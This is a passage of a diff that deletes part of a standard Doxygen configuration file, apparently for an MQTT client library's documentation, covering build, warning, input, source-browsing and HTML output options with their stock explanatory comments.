-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = NO
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = YES
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = NO
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-INPUT                  = MQTTClient.h \
-                         MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# none of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILTER_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
